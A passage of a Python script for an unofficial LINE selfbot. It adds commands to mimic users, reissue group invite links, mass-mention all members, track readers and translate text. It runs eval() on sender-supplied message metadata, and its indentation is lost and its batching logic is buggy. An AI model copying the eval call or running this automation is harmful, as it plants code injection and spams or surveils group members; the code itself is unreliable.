settings["mimic"]["target"][target] = True
line.sendMessage(msg.to,"เลียนแบบถูกเพิ่ม")
break
except:
line.sendMessage(msg.to,"ล้มเหลว")
break
elif msg.text.lower().startswith("เลียนแบบลบ "):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del settings["mimic"]["target"][target]
line.sendMessage(msg.to,"เลียบแบบลบ")
break
except:
line.sendMessage(msg.to,"ล้มเหลว")
break
elif text.lower() == 'เช็คเลียนแบบ':
if settings["mimic"]["target"] == {}:
line.sendMessage(msg.to,"Tidak Ada Target")
else:
mc = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
for mi_d in settings["mimic"]["target"]:
mc += "\n "+line.getContact(mi_d).displayName
line.sendMessage(msg.to,mc + "\n Ŧ€Āʍ ĦĀ¢₭€Ɖ ĊΦƉ€")
elif "mimic" in msg.text.lower():
sep = text.split(" ")
mic = text.replace(sep[0] + " ","")
if mic == "on":
if settings["mimic"]["status"] == False:
settings["mimic"]["status"] = True
line.sendMessage(msg.to,"Mimic enabled.")
elif mic == "off":
if settings["mimic"]["status"] == True:
settings["mimic"]["status"] = False
line.sendMessage(msg.to,"Mimic disabled.")
#==============================================================================#
elif text.lower() == 'เช็คแอด':
group = line.getGroup(to)
GS = group.creator.mid
line.sendContact(to, GS)
line.sendMessage(to, " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ ")
elif text.lower() == 'ไอดีกลุ่ม':
gid = line.getGroup(to)
line.sendMessage(to, "→ 〄 " + gid.id + " ←")
elif text.lower() == 'รูปกลุ่ม':
group = line.getGroup(to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
line.sendImageWithURL(to, path)
elif text.lower() == 'ชื่อกลุ่ม':
gid = line.getGroup(to)
line.sendMessage(to, "→ " + gid.name + " ←")
elif text.lower() == 'ขอลิ้งค์':
if msg.toType == 2:
group = line.getGroup(to)
if group.preventedJoinByTicket == False:
ticket = line.reissueGroupTicket(to)
line.sendMessage(to, "นี้คือ QR ของกลุ่มนี้ สามารถนำปใช้ได้เลย \nhttps://line.me/R/ti/g/{}".format(str(ticket)))
elif text.lower() == 'เปิดลิ้งค์':
if msg.toType == 2:
group = line.getGroup(to)
if group.preventedJoinByTicket == False:
line.sendMessage(to, "เปิดอยู่กรุณา สั่งคำว่า ของลิ้งค์")
else:
group.preventedJoinByTicket = False
line.updateGroup(group)
line.sendMessage(to, "เปิดQRกลุ่มเป็นอันที่เรียบร้อย")
elif text.lower() == 'ปิดลิ้งค์':
if msg.toType == 2:
group = line.getGroup(to)
if group.preventedJoinByTicket == True:
line.sendMessage(to, "ปิดอยุ่อ่ะจะปิดไรอีกละ")
else:
group.preventedJoinByTicket = True
line.updateGroup(group)
line.sendMessage(to, "OK ﻬ QR ปิดละ")
elif text.lower() == 'ข้อมูลห้อง':
group = line.getGroup(to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Tidak ditemukan"
if group.invitee is None:
gPending = "0"
else:
gPending = str(len(group.invitee))
if group.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(line.reissueGroupTicket(group.id)))
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
ret_ += "\nชื่อกลุ่ม ⋙ {}".format(str(group.name))
ret_ += "\nGidกลุ่ม ⋙ {}".format(group.id)
ret_ += "\nผู้สร้างกลุ่ม ⋙ {}".format(str(gCreator))
ret_ += "\nจำนวนสมาชิก ⋙ {}".format(str(len(group.members)))
ret_ += "\nสมาชิกค้างเชิญ ⋙ {}".format(gPending)
ret_ += "\nQR ของกลุ่ม ⋙ ".format(gQr)
ret_ += "\n ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
line.sendMessage(to, str(ret_))
line.sendImageWithURL(to, path)
elif text.lower() == 'สมาชิก':
if msg.toType == 2:
group = line.getGroup(to)
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
no = 0 + 1
for mem in group.members:
ret_ += "\n↜ ↝ {}. {}".format(str(no), str(mem.displayName))
no += 1
ret_ += "\n ↠ จำนวน {} คน ↞ ".format(str(len(group.members)))
line.sendMessage(to, str(ret_))
elif text.lower() == 'กลุ่ม':
groups = line.groups
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
no = 0 + 1
for gid in groups:
group = line.getGroup(gid)
ret_ += "\n➢ {}. {} | {}".format(str(no), str(group.name), str(len(group.members)))
no += 1
ret_ += "\n จำนวน {} กลุ่ม ".format(str(len(groups)))
line.sendMessage(to, str(ret_))
elif text.lower() == '1กลุ่ม':
groups = ki.groups
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
no = 0 + 1
for gid in groups:
group = ki.getGroup(gid)
ret_ += "\n➢ {}. {} | {}".format(str(no), str(group.name), str(len(group.members)))
no += 1
ret_ += "\n จำนวน {} กลุ่ม ".format(str(len(groups)))
ki.sendMessage(to, str(ret_))
elif text.lower() == '2กลุ่ม':
groups = kk.groups
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ "
no = 0 + 1
for gid in groups:
group = kk.getGroup(gid)
ret_ += "\n➢ {}. {} | {}".format(str(no), str(group.name), str(len(group.members)))
no += 1
ret_ += "\n จำนวน {} กลุ่ม".format(str(len(groups)))
kk.sendMessage(to, str(ret_))
elif text.lower() == '3กลุ่ม':
groups = kc.groups
ret_ = "╔══[ Group List ]"
no = 0 + 1
for gid in groups:
group = kc.getGroup(gid)
ret_ += "\n➢ {}. {} | {}".format(str(no), str(group.name), str(len(group.members)))
no += 1
ret_ += "\n จำนวน {} กลุ่ม".format(str(len(groups)))
kc.sendMessage(to, str(ret_))
#==============================================================================#
#==============================================================================#
elif text.lower() == 'แท็ก':
if msg.toType == 0:
sendMention(to, to, "", "")
elif msg.toType == 2:
group = line.getGroup(to)
contact = [mem.mid for mem in group.members]
ct1, ct2, ct3, ct4, ct5, jml = [], [], [], [], [], len(contact)
if jml <= 100:
mentionMembers(to, contact)
elif jml > 100 and jml <= 200:
for a in range(0, 99):
ct1 += [contact[a]]
for b in range(100, jml):
ct2 += [contact[b]]
mentionMembers(to, ct1)
mentionMembers(to, ct2)
elif jml > 200 and jml <= 300:
for a in range(0, 99):
ct1 += [contact[a]]
for b in range(100, 199):
ct2 += [contact[b]]
for c in range(200, jml):
ct3 += [contact[c]]
mentionMembers(to, ct1)
mentionMembers(to, ct2)
mentionMembers(to, ct3)
elif jml > 300 and jml <= 400:
for a in range(0, 99):
ct1 += [contact[a]]
for b in range(100, 199):
ct2 += [contact[b]]
for c in range(200, 299):
ct3 += [contact[c]]
for d in range(300, jml):
ct4 += [contact[d]]
mentionMembers(to, ct1)
mentionMembers(to, ct2)
mentionMembers(to, ct3)
mentionMembers(to, ct4)
elif jml > 400 and jml <= 500:
for a in range(0, 99):
ct1 += [contact[a]]
for b in range(100, 199):
ct2 += [contact[b]]
for c in range(200, 299):
ct3 += [contact[c]]
for d in range(300, 399):
ct4 += [contact[d]]
for e in range(400, jml):
ct4 += [contact[e]]
mentionMembers(to, ct1)
mentionMembers(to, ct2)
mentionMembers(to, ct3)
mentionMembers(to, ct4)
mentionMembers(to, ct5)
#===================================================================#
elif text.lower() == 'เช็ค':
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["วันอาทิตย์", "วันจันทร์", "วันอังคาร", "วันพุธ", "วันพฤหัสบดี", "วันศุกร์", "วันเสาร์"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
hr = timeNow.strftime("%A")
bln = timeNow.strftime("%m")
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
readTime = hasil + ", " + timeNow.strftime('%d') + " - " + bln + " - " + timeNow.strftime('%Y') + "\nเวลา [ " + timeNow.strftime('%H:%M:%S') + " ]"
if msg.to in read['readPoint']:
try:
del read['readPoint'][msg.to]
del read['readMember'][msg.to]
del read['readTime'][msg.to]
except:
pass
read['readPoint'][msg.to] = msg.id
read['readMember'][msg.to] = ""
read['readTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
read['ROM'][msg.to] = {}
with open('read.json', 'w') as fp:
json.dump(read, fp, sort_keys=True, indent=4)
line.sendMessage(msg.to,"Lurking enabled")
else:
try:
del read['readPoint'][msg.to]
del read['readMember'][msg.to]
del read['readTime'][msg.to]
except:
pass
read['readPoint'][msg.to] = msg.id
read['readMember'][msg.to] = ""
read['readTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
read['ROM'][msg.to] = {}
with open('read.json', 'w') as fp:
json.dump(read, fp, sort_keys=True, indent=4)
line.sendMessage(msg.to, "เริ่มตรวจจับรายชื่อคนอ่านแบบแท็ก\n" + readTime)
elif text.lower() == 'อ่าน':
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["วันอาทิตย์", "วันจันทร์", "วันอังคาร", "วันพุธ", "วันพฤหัสบดี", "วันศุกร์", "วันเสาร์"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
hr = timeNow.strftime("%A")
bln = timeNow.strftime("%m")
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
readTime = hasil + ", " + timeNow.strftime('%d') + " - " + bln + " - " + timeNow.strftime('%Y') + "\nเวลา [ " + timeNow.strftime('%H:%M:%S') + " ]"
if receiver in read['readPoint']:
if list(read["ROM"][receiver].items()) == []:
line.sendMessage(receiver,"รายชื่อคนที่อ่าน \nNone")
else:
chiya = []
for rom in list(read["ROM"][receiver].items()):
chiya.append(rom[1])
cmem = line.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'รายชื่อคนที่อ่าน \n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@c\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
text = xpesan+ zxc + "\nเวลาที่อ่าน \n" + readTime
try:
line.sendMessage(receiver, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except Exception as error:
print (error)
pass
else:
line.sendMessage(receiver,"สั่งเช็คใหม่แล้วสั่งอ่านใหม่อีกรอบ \n ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️ ")
elif msg.text.lower().startswith("tr-af "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='af')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sq "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sq')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-am "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='am')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ar "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ar')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hy "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hy')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-az "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='az')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-eu "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='eu')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-be "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='be')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-bn "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='bn')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-bs "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='bs')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-bg "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='bg')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ca "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ca')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ceb "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ceb')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ny "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ny')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-zh-cn "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='zh-cn')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-zh-tw "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='zh-tw')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-co "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='co')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hr "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hr')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-cs "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='cs')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-da "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='da')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-nl "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='nl')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-en "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-et "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='et')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fi "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fi')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fr "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fr')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fy "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fy')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-gl "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='gl')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ka "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ka')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-de "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='de')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-el "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='el')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-gu "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='gu')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ht "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ht')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ha "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ha')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-haw "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='haw')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-iw "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='iw')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hi "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hi')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hmn "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hmn')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hu "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hu')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-is "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='is')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ig "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ig')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-id "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ga "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ga')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-it "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='it')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ja "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-jw "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='jw')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-kn "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='kn')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-kk "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='kk')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-km "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='km')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ko "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ku "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ku')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ky "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ky')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lo "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lo')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-la "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='la')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lv "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lv')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lt "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lt')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-lb "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='lb')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mk "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mk')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mg "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mg')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ms "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ms')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ml "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ml')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mt "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mt')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mi "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mi')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mr "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mr')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-mn "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='mn')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-my "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='my')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ne "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ne')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-no "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='no')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ps "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ps')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-fa "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='fa')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-pl "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='pl')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-pt "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='pt')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-pa "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='pa')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ro "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ro')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ru "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ru')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sm "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sm')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-gd "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='gd')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sr "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sr')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-st "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='st')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sn "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sn')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sd "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sd')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-si "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='si')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sk "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sk')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sl "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sl')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-so "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='so')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-es "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='es')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-su "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='su')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sw "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sw')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sv "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sv')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-tg "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='tg')
A = hasil.text
line.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ta "):
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ta')
A = hasil.text
line.sendMessage(msg.to, A)
